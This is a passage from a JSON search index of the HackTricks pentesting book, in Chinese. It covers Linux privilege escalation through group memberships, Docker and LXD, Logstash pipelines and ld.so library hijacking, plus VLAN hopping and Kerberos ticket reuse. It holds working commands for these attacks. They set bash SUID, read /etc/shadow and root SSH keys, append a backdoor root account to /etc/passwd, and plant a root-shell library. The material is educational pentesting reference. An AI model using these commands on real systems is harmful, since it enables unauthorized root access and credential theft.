command as another user: Not authorized 这不是因为你没有权限,而是因为你没有通过 GUI 连接 。对此问题有一个解决方法在这里: https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903 。你需要 2 个不同的 ssh 会话 : session1 echo $$ #Step1: Get current PID\\npkexec \\"/bin/bash\\" #Step 3, execute pkexec\\n#Step 5, if correctly authenticate, you will have a root session session2 pkttyagent --process #Step 2, attach pkttyagent to session1\\n#Step 4, you will be asked in this session to authenticate to pkexec","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » PE - Method 2","id":"1792","title":"PE - Method 2"},"1793":{"body":"有时 , 默认情况下 在 /etc/sudoers 文件中可以找到这一行: %wheel\\tALL=(ALL:ALL) ALL 这意味着 任何属于 wheel 组的用户都可以以 sudo 身份执行任何操作 。 如果是这样,要 成为 root,你只需执行 : sudo su","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » Wheel Group","id":"1793","title":"Wheel Group"},"1794":{"body":"来自 group shadow 的用户可以 read /etc/shadow 文件: -rw-r----- 1 root shadow 1824 Apr 26 19:10 /etc/shadow So, read the file and try to crack some hashes .","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » Shadow Group","id":"1794","title":"Shadow Group"},"1795":{"body":"staff : 允许用户在不需要根权限的情况下对系统(/usr/local)进行本地修改(请注意,/usr/local/bin 中的可执行文件在任何用户的 PATH 变量中,并且它们可能会“覆盖” /bin 和 /usr/bin 中同名的可执行文件)。与更相关于监控/安全的 \\"adm\\" 组进行比较。 [source] 在 debian 发行版中,$PATH 变量显示 /usr/local/ 将以最高优先级运行,无论您是否是特权用户。 bash $ echo $PATH\\n/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games # echo $PATH\\n/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 如果我们可以劫持 /usr/local 中的一些程序,我们就可以轻松获得 root 权限。 劫持 run-parts 程序是一种轻松获得 root 权限的方法,因为大多数程序会像 (crontab, 当 ssh 登录时) 一样运行 run-parts。 bash $ cat /etc/crontab | grep run-parts\\n17 * * * * root cd / && run-parts --report /etc/cron.hourly\\n25 6 * * * root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.daily; }\\n47 6 * * 7 root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.weekly; }\\n52 6 1 * * root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.monthly; } 或当新的ssh会话登录时。 bash $ pspy64\\n2024/02/01 22:02:08 CMD: UID=0 PID=1 | init [2]\\n2024/02/01 22:02:10 CMD: UID=0 PID=17883 | sshd: [accepted]\\n2024/02/01 22:02:10 CMD: UID=0 PID=17884 | sshd: [accepted]\\n2024/02/01 22:02:14 CMD: UID=0 PID=17886 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new\\n2024/02/01 22:02:14 CMD: UID=0 PID=17887 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new\\n2024/02/01 22:02:14 CMD: UID=0 PID=17888 | run-parts --lsbsysinit /etc/update-motd.d\\n2024/02/01 22:02:14 CMD: UID=0 PID=17889 | uname -rnsom\\n2024/02/01 22:02:14 CMD: UID=0 PID=17890 | sshd: mane [priv]\\n2024/02/01 22:02:15 CMD: UID=0 PID=17891 | -bash 利用 bash # 0x1 Add a run-parts script in /usr/local/bin/\\n$ vi /usr/local/bin/run-parts\\n#! /bin/bash\\nchmod 4777 /bin/bash # 0x2 Don\'t forget to add a execute permission\\n$ chmod +x /usr/local/bin/run-parts # 0x3 start a new ssh sesstion to trigger the run-parts program # 0x4 check premission for `u+s`\\n$ ls -la /bin/bash\\n-rwsrwxrwx 1 root root 1099016 May 15 2017 /bin/bash # 0x5 root it\\n$ /bin/bash -p","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » Staff Group","id":"1795","title":"Staff Group"},"1796":{"body":"此权限几乎 等同于根访问 ,因为您可以访问机器内部的所有数据。 文件:/dev/sd[a-z][1-9] bash df -h #Find where \\"/\\" is mounted\\ndebugfs /dev/sda1\\ndebugfs: cd /root\\ndebugfs: ls\\ndebugfs: cat /root/.ssh/id_rsa\\ndebugfs: cat /etc/shadow 请注意,使用 debugfs 您也可以 写入文件 。例如,要将 /tmp/asd1.txt 复制到 /tmp/asd2.txt,您可以执行: bash debugfs -w /dev/sda1\\ndebugfs: dump /tmp/asd1.txt /tmp/asd2.txt 然而,如果你尝试 写入由 root 拥有的文件 (如 /etc/shadow 或 /etc/passwd),你将会遇到“ 权限被拒绝 ”的错误。","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » 磁盘组","id":"1796","title":"磁盘组"},"1797":{"body":"使用命令 w 你可以找到 谁登录了系统 ,它将显示如下输出: bash USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT\\nyossi tty1 22:16 5:13m 0.05s 0.04s -bash\\nmoshe pts/1 10.10.14.44 02:53 24:07 0.06s 0.06s /bin/bash tty1 表示用户 yossi 物理登录 到机器上的一个终端。 video group 有权限查看屏幕输出。基本上,你可以观察屏幕。为了做到这一点,你需要 抓取当前屏幕上的图像 的原始数据,并获取屏幕使用的分辨率。屏幕数据可以保存在 /dev/fb0,你可以在 /sys/class/graphics/fb0/virtual_size 找到该屏幕的分辨率。 bash cat /dev/fb0 > /tmp/screen.raw\\ncat /sys/class/graphics/fb0/virtual_size 要 打开 原始图像 ,您可以使用 GIMP ,选择**screen.raw 文件,并选择文件类型为 原始图像数据**: 然后将宽度和高度修改为屏幕上使用的值,并检查不同的图像类型(并选择显示屏幕效果更好的那个):","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » Video Group","id":"1797","title":"Video Group"},"1798":{"body":"看起来默认情况下 root组的成员 可以访问 修改 某些 服务 配置文件或某些 库 文件或 其他有趣的东西 ,这些都可以用来提升权限... 检查root成员可以修改哪些文件 : bash find / -group root -perm -g=w 2>/dev/null","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » Root Group","id":"1798","title":"Root Group"},"1799":{"body":"您可以 将主机的根文件系统挂载到实例的卷 ,因此当实例启动时,它会立即加载一个 chroot 到该卷。这实际上使您在机器上获得了 root 权限。 bash docker image #Get images from the docker service #Get a shell inside a docker container with access as root to the filesystem\\ndocker run -it --rm -v /:/mnt chroot /mnt bash\\n#If you want full access from the host, create a backdoor in the passwd file\\necho \'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh\' >> /etc/passwd #Ifyou just want filesystem and network access you can startthe following container:\\ndocker run --rm -it --pid=host --net=host --privileged -v /:/mnt chroot /mnt bashbash 最后,如果你不喜欢之前的任何建议,或者由于某种原因它们不起作用(docker api 防火墙?),你可以尝试 运行一个特权容器并从中逃逸 ,如这里所述: Docker Security 如果你对 docker socket 有写权限,请阅读 这篇关于如何通过滥用 docker socket 提升权限的文章 . GitHub - KrustyHack/docker-privilege-escalation: A docker example for privilege escalation Privilege escalation via Docker - Chris Foster","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » Docker 组","id":"1799","title":"Docker 组"},"18":{"body":"tip 这些是 HackTricks 项目的价值观 : 为 所有 互联网用户提供 免费 的 教育黑客 资源。 黑客是关于学习的,而学习应该尽可能免费。 本书的目的是作为一个全面的 教育资源 。 存储 社区发布的精彩 黑客 技术,并给予 原作者 所有的 荣誉 。 我们不想要其他人的荣誉 ,我们只想为大家存储酷炫的技巧。 我们还在 HackTricks 中撰写 我们自己的研究 。 在某些情况下,我们将仅在 HackTricks 中写出技术的重要部分的 摘要 ,并 鼓励读者访问原始帖子 以获取更多细节。 组织 书中的所有黑客技术,使其 更易获取 。 HackTricks 团队投入了数千小时的时间, 仅仅是为了组织内容 ,以便人们可以 更快学习 。","breadcrumbs":"HackTricks Values & FAQ » HackTricks 值观","id":"18","title":"HackTricks 值观"},"180":{"body":"https://github.com/vecna/sniffjoke tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Network » IDS and IPS Evasion » 工具","id":"180","title":"工具"},"1800":{"body":"Interesting Groups - Linux Privesc","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » lxc/lxd 组","id":"1800","title":"lxc/lxd 组"},"1801":{"body":"通常, adm 组的 成员 有权限 读取 位于 /var/log/ 中的日志文件。 因此,如果你已经攻陷了该组中的用户,你应该确实 查看日志 。","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » Adm 组","id":"1801","title":"Adm 组"},"1802":{"body":"在 OpenBSD 中, auth 组通常可以在 /etc/skey 和 /var/db/yubikey 文件夹中写入(如果它们被使用)。 这些权限可能会被以下漏洞利用,以 提升权限 到 root: https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » Auth 组","id":"1802","title":"Auth 组"},"1803":{"body":"Reading time: 5 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 如果您属于 lxd 或 lxc 组 ,您可以成为 root","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » lxd/lxc Group - Privilege escalation » lxd/lxc 组 - 权限提升","id":"1803","title":"lxd/lxc 组 - 权限提升"},"1804":{"body":"","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » lxd/lxc Group - Privilege escalation » 无需互联网的利用","id":"1804","title":"无需互联网的利用"},"1805":{"body":"您可以从受信任的存储库下载一个 alpine 镜像以供 lxd 使用。Canonical 在他们的网站上发布每日构建: https://images.lxd.canonical.com/images/alpine/3.18/amd64/default/ 只需从最新构建中获取 lxd.tar.xz 和 rootfs.squashfs 。(目录名称是日期)。 或者,您可以在您的机器上安装这个发行版构建工具: https://github.com/lxc/distrobuilder (按照 GitHub 的说明进行操作): bash # Install requirements\\nsudo apt update\\nsudo apt install -y golang-go gcc debootstrap rsync gpg squashfs-tools git make build-essential libwin-hivex-perl wimtools genisoimage # Clone repo\\nmkdir -p $HOME/go/src/github.com/lxc/\\ncd $HOME/go/src/github.com/lxc/\\ngit clone https://github.com/lxc/distrobuilder # Make distrobuilder\\ncd ./distrobuilder\\nmake # Prepare the creation of alpine\\nmkdir -p $HOME/ContainerImages/alpine/\\ncd $HOME/ContainerImages/alpine/\\nwget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml # Create the container - Beware of architecture while compiling locally.\\nsudo $HOME/go/bin/distrobuilder build-incus alpine.yaml -o image.release=3.18 -o image.architecture=x86_64 上传文件 incus.tar.xz (如果从 Canonical 仓库下载,则为 lxd.tar.xz )和 rootfs.squashfs ,将镜像添加到仓库并创建一个容器: bash lxc image import lxd.tar.xz rootfs.squashfs --alias alpine # Check the image is there\\nlxc image list # Create the container\\nlxc init alpine privesc -c security.privileged=true # List containers\\nlxc list lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true caution 如果您发现此错误 错误:未找到存储池。请创建一个新的存储池 运行 lxd init 并将所有选项设置为默认值。然后 重复 之前的命令块 最后,您可以执行容器并获取 root: bash lxc start privesc\\nlxc exec privesc /bin/sh\\n[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » lxd/lxc Group - Privilege escalation » 方法 1","id":"1805","title":"方法 1"},"1806":{"body":"构建一个 Alpine 镜像并使用标志 security.privileged=true 启动它,强制容器以 root 身份与主机文件系统交互。 bash # build a simple alpine image\\ngit clone https://github.com/saghul/lxd-alpine-builder\\ncd lxd-alpine-builder\\nsed -i \'s,yaml_path=\\"latest-stable/releases/$apk_arch/latest-releases.yaml\\",yaml_path=\\"v3.8/releases/$apk_arch/latest-releases.yaml\\",\' build-alpine\\nsudo ./build-alpine -a i686 # import the image\\nlxc image import ./alpine*.tar.gz --alias myimage # It\'s important doing this from YOUR HOME directory on the victim machine, or it might fail. # before running the image, start and configure the lxd storage pool as default\\nlxd init # run the image\\nlxc init myimage mycontainer -c security.privileged=true # mount the /root into the image\\nlxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Interesting Groups - Linux Privesc » lxd/lxc Group - Privilege escalation » 方法 2","id":"1806","title":"方法 2"},"1807":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 Logstash 用于 收集、转换和分发日志 ,通过一个称为 管道 的系统。这些管道由 输入 、 过滤 和 输出 阶段组成。当 Logstash 在被攻陷的机器上运行时,会出现一个有趣的方面。","breadcrumbs":"Linux Privilege Escalation » Logstash » Logstash","id":"1807","title":"Logstash"},"1808":{"body":"管道在文件 /etc/logstash/pipelines.yml 中配置,该文件列出了管道配置的位置: yaml # Define your pipelines here. Multiple pipelines can be defined.\\n# For details on multiple pipelines, refer to the documentation:\\n# https://www.elastic.co/guide/en/logstash/current/multiple-pipelines.html - pipeline.id: main\\npath.config: \\"/etc/logstash/conf.d/*.conf\\"\\n- pipeline.id: example\\npath.config: \\"/usr/share/logstash/pipeline/1*.conf\\"\\npipeline.workers: 6 该文件揭示了包含管道配置的 .conf 文件的位置。当使用 Elasticsearch output module 时, pipelines 通常包含 Elasticsearch credentials ,这些凭据由于 Logstash 需要将数据写入 Elasticsearch,通常具有广泛的权限。配置路径中的通配符允许 Logstash 执行指定目录中所有匹配的管道。","breadcrumbs":"Linux Privilege Escalation » Logstash » Pipeline Configuration","id":"1808","title":"Pipeline Configuration"},"1809":{"body":"要尝试权限提升,首先识别 Logstash 服务运行的用户,通常是 logstash 用户。确保满足 以下 条件之一: 拥有对管道 .conf 文件的 写访问 或 /etc/logstash/pipelines.yml 文件使用了通配符,并且您可以写入目标文件夹 此外,必须满足 以下 条件之一: 能够重启 Logstash 服务 或 /etc/logstash/logstash.yml 文件中设置了 config.reload.automatic: true 鉴于配置中存在通配符,创建一个与该通配符匹配的文件可以执行命令。例如: bash input {\\nexec {\\ncommand => \\"whoami\\"\\ninterval => 120\\n}\\n} output {\\nfile {\\npath => \\"/tmp/output.log\\"\\ncodec => rubydebug\\n}\\n} 这里, interval 决定了执行频率(以秒为单位)。在给定的示例中, whoami 命令每 120 秒运行一次,其输出被定向到 /tmp/output.log 。 在 /etc/logstash/logstash.yml 中设置 config.reload.automatic: true ,Logstash 将自动检测并应用新的或修改过的管道配置,而无需重启。如果没有通配符,仍然可以对现有配置进行修改,但建议谨慎操作以避免中断。","breadcrumbs":"Linux Privilege Escalation » Logstash » 通过可写管道进行权限提升","id":"1809","title":"通过可写管道进行权限提升"},"181":{"body":"Reading time: 10 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 如果可以直接访问交换机,则可以绕过VLAN分段。这涉及将连接端口重新配置为干道模式,为目标VLAN建立虚拟接口,并根据场景设置IP地址(动态(DHCP)或静态)( 有关更多详细信息,请查看 https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 )。 最初,需要识别特定的连接端口。这通常可以通过CDP消息完成,或通过 include 掩码搜索端口。 如果CDP未运行,可以尝试通过搜索MAC地址进行端口识别 : SW1(config)# show mac address-table | include 0050.0000.0500 在切换到干线模式之前,应编制现有VLAN的列表,并确定它们的标识符。然后将这些标识符分配给接口,从而通过干线访问各种VLAN。例如,正在使用的端口与VLAN 10相关联。 SW1# show vlan brief 切换到干线模式需要进入接口配置模式 : SW1(config)# interface GigabitEthernet 0/2\\nSW1(config-if)# switchport trunk encapsulation dot1q\\nSW1(config-if)# switchport mode trunk 切换到 trunk 模式会暂时中断连接,但随后可以恢复。 然后创建虚拟接口,分配 VLAN ID,并激活: bash # Legacy (vconfig) – still works but deprecated in modern kernels\\nsudo vconfig add eth0 10\\nsudo vconfig add eth0 20\\nsudo vconfig add eth0 50\\nsudo vconfig add eth0 60\\nsudo ifconfig eth0.10 up\\nsudo ifconfig eth0.20 up\\nsudo ifconfig eth0.50 up\\nsudo ifconfig eth0.60 up # Modern (ip-link – preferred)\\nsudo modprobe 8021q\\nsudo ip link add link eth0 name eth0.10 type vlan id 10\\nsudo ip link add link eth0 name eth0.20 type vlan id 20\\nsudo ip link set eth0.10 up\\nsudo ip link set eth0.20 up\\nsudo dhclient -v eth0.50\\nsudo dhclient -v eth0.60 随后,通过DHCP发出地址请求。或者,在DHCP不可行的情况下,可以手动配置地址: bash sudo dhclient -v eth0.10\\nsudo dhclient -v eth0.20 在接口上手动设置静态IP地址的示例(VLAN 10): bash sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0\\n# or\\nsudo ip addr add 10.10.10.66/24 dev eth0.10 连接性通过向VLAN 10、20、50和60的默认网关发起ICMP请求进行测试。 最终,这个过程使得绕过VLAN分段成为可能,从而促进对任何VLAN网络的无限制访问,并为后续操作奠定基础。","breadcrumbs":"Pentesting Network » Lateral VLAN Segmentation Bypass » Lateral VLAN Segmentation Bypass","id":"181","title":"Lateral VLAN Segmentation Bypass"},"1810":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Logstash » References","id":"1810","title":"References"},"1811":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » ld.so privesc exploit example » ld.so 提权漏洞示例","id":"1811","title":"ld.so 提权漏洞示例"},"1812":{"body":"在以下部分中,您可以找到我们将用于准备环境的文件代码 sharedvuln.c\\nlibcustom.h\\nlibcustom.c c #include \\n#include \\"libcustom.h\\" int main(){\\nprintf(\\"Welcome to my amazing application!\\\\n\\");\\nvuln_func();\\nreturn 0;\\n} c #include void vuln_func(); c #include void vuln_func()\\n{\\nputs(\\"Hi\\");\\n} 在 您的机器上在同一文件夹中 创建 这些文件 编译 库 : gcc -shared -o libcustom.so -fPIC libcustom.c 复制 libcustom.so 到 /usr/lib: sudo cp libcustom.so /usr/lib (root 权限) 编译 可执行文件 : gcc sharedvuln.c -o sharedvuln -lcustom","breadcrumbs":"Linux Privilege Escalation » ld.so privesc exploit example » 准备环境","id":"1812","title":"准备环境"},"1813":{"body":"检查 libcustom.so 是否从 /usr/lib 加载 ,并且您可以 执行 该二进制文件。 $ ldd sharedvuln\\nlinux-vdso.so.1 => (0x00007ffc9a1f7000)\\nlibcustom.so => /usr/lib/libcustom.so (0x00007fb27ff4d000)\\nlibc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fb27fb83000)\\n/lib64/ld-linux-x86-64.so.2 (0x00007fb28014f000) $ ./sharedvuln\\nWelcome to my amazing application!\\nHi","breadcrumbs":"Linux Privilege Escalation » ld.so privesc exploit example » 检查环境","id":"1813","title":"检查环境"},"1814":{"body":"在这个场景中,我们将假设 某人已在 /etc/ld.so.conf/ 文件中创建了一个易受攻击的入口 : bash sudo echo \\"/home/ubuntu/lib\\" > /etc/ld.so.conf.d/privesc.conf 易受攻击的文件夹是 /home/ubuntu/lib (我们具有可写访问权限)。 下载并编译 以下代码到该路径: c //gcc -shared -o libcustom.so -fPIC libcustom.c #include \\n#include \\n#include void vuln_func(){\\nsetuid(0);\\nsetgid(0);\\nprintf(\\"I\'m the bad library\\\\n\\");\\nsystem(\\"/bin/sh\\",NULL,NULL);\\n} 现在我们已经 在错误配置的 路径中创建了恶意的 libcustom 库,我们需要等待 重启 或 root 用户执行 ldconfig ( 如果您可以作为 sudo 执行此二进制文件,或者它具有 suid 位 ,您将能够自己执行它 )。 一旦发生这种情况,请 重新检查 sharevuln 可执行文件从哪里加载 libcustom.so 库: c $ldd sharedvuln\\nlinux-vdso.so.1 => (0x00007ffeee766000)\\nlibcustom.so => /home/ubuntu/lib/libcustom.so (0x00007f3f27c1a000)\\nlibc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f3f27850000)\\n/lib64/ld-linux-x86-64.so.2 (0x00007f3f27e1c000) 如您所见,它是 从 /home/ubuntu/lib 加载的 ,如果任何用户执行它,将会执行一个 shell: c $ ./sharedvuln\\nWelcome to my amazing application!\\nI\'m the bad library\\n$ whoami\\nubuntu note 请注意,在这个例子中我们没有提升权限,但通过修改执行的命令并 等待 root 或其他特权用户执行易受攻击的二进制文件 ,我们将能够提升权限。","breadcrumbs":"Linux Privilege Escalation » ld.so privesc exploit example » Exploit","id":"1814","title":"Exploit"},"1815":{"body":"在前面的例子中,我们伪造了一个错误配置,其中管理员 在 /etc/ld.so.conf.d/ 中的配置文件内设置了一个非特权文件夹 。 但是还有其他错误配置可能导致相同的漏洞,如果您在 /etc/ld.so.conf.d 中的某些 配置文件 、文件夹 /etc/ld.so.conf.d 或文件 /etc/ld.so.conf 中具有 写权限 ,您可以配置相同的漏洞并进行利用。","breadcrumbs":"Linux Privilege Escalation » ld.so privesc exploit example » 其他错误配置 - 相同漏洞","id":"1815","title":"其他错误配置 - 相同漏洞"},"1816":{"body":"假设您对 ldconfig 具有 sudo 权限 。 您可以指示 ldconfig 从哪里加载配置文件 ,因此我们可以利用它使 ldconfig 加载任意文件夹。 所以,让我们创建加载 \\"/tmp\\" 所需的文件和文件夹: bash cd /tmp\\necho \\"include /tmp/conf/*\\" > fake.ld.so.conf\\necho \\"/tmp\\" > conf/evil.conf 现在,如 之前的漏洞 所示, 在 /tmp 中创建恶意库 。 最后,让我们加载路径并检查二进制文件从哪里加载库: bash ldconfig -f fake.ld.so.conf ldd sharedvuln\\nlinux-vdso.so.1 => (0x00007fffa2dde000)\\nlibcustom.so => /tmp/libcustom.so (0x00007fcb07756000)\\nlibc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fcb0738c000)\\n/lib64/ld-linux-x86-64.so.2 (0x00007fcb07958000) 正如您所看到的,拥有 ldconfig 的 sudo 权限,您可以利用相同的漏洞。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » ld.so privesc exploit example » Exploit 2","id":"1816","title":"Exploit 2"},"1817":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 一台 Linux 机器也可以存在于 Active Directory 环境中。 在 AD 中的 Linux 机器可能会 在文件中存储不同的 CCACHE 票证。这些票证可以像其他任何 kerberos 票证一样被使用和滥用 。为了读取这些票证,您需要是票证的用户所有者或 root 用户。","breadcrumbs":"Linux Privilege Escalation » Linux Active Directory » Linux Active Directory","id":"1817","title":"Linux Active Directory"},"1818":{"body":"","breadcrumbs":"Linux Privilege Escalation » Linux Active Directory » Enumeration","id":"1818","title":"Enumeration"},"1819":{"body":"如果您在 Linux(或 Windows 的 bash)中访问 AD,您可以尝试 https://github.com/lefayjey/linWinPwn 来枚举 AD。 您还可以查看以下页面以了解 从 Linux 枚举 AD 的其他方法 : 389, 636, 3268, 3269 - Pentesting LDAP","breadcrumbs":"Linux Privilege Escalation » Linux Active Directory » 从 Linux 进行 AD 枚举","id":"1819","title":"从 Linux 进行 AD 枚举"},"182":{"body":"前面的方法假设已获得交换机的认证控制台或Telnet/SSH访问。在实际操作中,攻击者通常连接到一个 常规接入端口 。以下的第2层技巧通常允许您在不登录交换机操作系统的情况下横向移动:","breadcrumbs":"Pentesting Network » Lateral VLAN Segmentation Bypass » 其他VLAN跳跃技术(无特权交换机CLI)","id":"182","title":"其他VLAN跳跃技术(无特权交换机CLI)"},"1820":{"body":"FreeIPA 是一个开源的 替代品 ,用于 Microsoft Windows Active Directory ,主要用于 Unix 环境。它结合了一个完整的 LDAP 目录 和一个 MIT Kerberos 密钥分发中心,管理方式类似于 Active Directory。利用 Dogtag 证书系统 进行 CA 和 RA 证书管理,支持 多因素 身份验证,包括智能卡。SSSD 集成用于 Unix 身份验证过程。了解更多信息: FreeIPA Pentesting","breadcrumbs":"Linux Privilege Escalation » Linux Active Directory » FreeIPA","id":"1820","title":"FreeIPA"},"1821":{"body":"","breadcrumbs":"Linux Privilege Escalation » Linux Active Directory » 玩票证","id":"1821","title":"玩票证"},"1822":{"body":"在此页面中,您将找到不同的地方,您可以 在 Linux 主机中找到 kerberos 票证 ,在以下页面中,您可以了解如何将这些 CCache 票证格式转换为 Kirbi(您在 Windows 中需要使用的格式),以及如何执行 PTT 攻击: Pass the Ticket","breadcrumbs":"Linux Privilege Escalation » Linux Active Directory » Pass The Ticket","id":"1822","title":"Pass The Ticket"},"1823":{"body":"CCACHE 文件是用于 存储 Kerberos 凭据 的二进制格式,通常以 600 权限存储在 /tmp 中。这些文件可以通过其 名称格式 krb5cc_%{uid} 进行识别,与用户的 UID 相关联。为了验证身份验证票证, 环境变量 KRB5CCNAME 应设置为所需票证文件的路径,以便启用其重用。 使用 env | grep KRB5CCNAME 列出当前用于身份验证的票证。该格式是可移植的,票证可以通过设置环境变量 重用 ,使用 export KRB5CCNAME=/tmp/ticket.ccache。Kerberos 票证名称格式为 krb5cc_%{uid},其中 uid 是用户 UID。 bash # Find tickets\\nls /tmp/ | grep krb5cc\\nkrb5cc_1000 # Prepare to use it\\nexport KRB5CCNAME=/tmp/krb5cc_1000","breadcrumbs":"Linux Privilege Escalation » Linux Active Directory » 从 /tmp 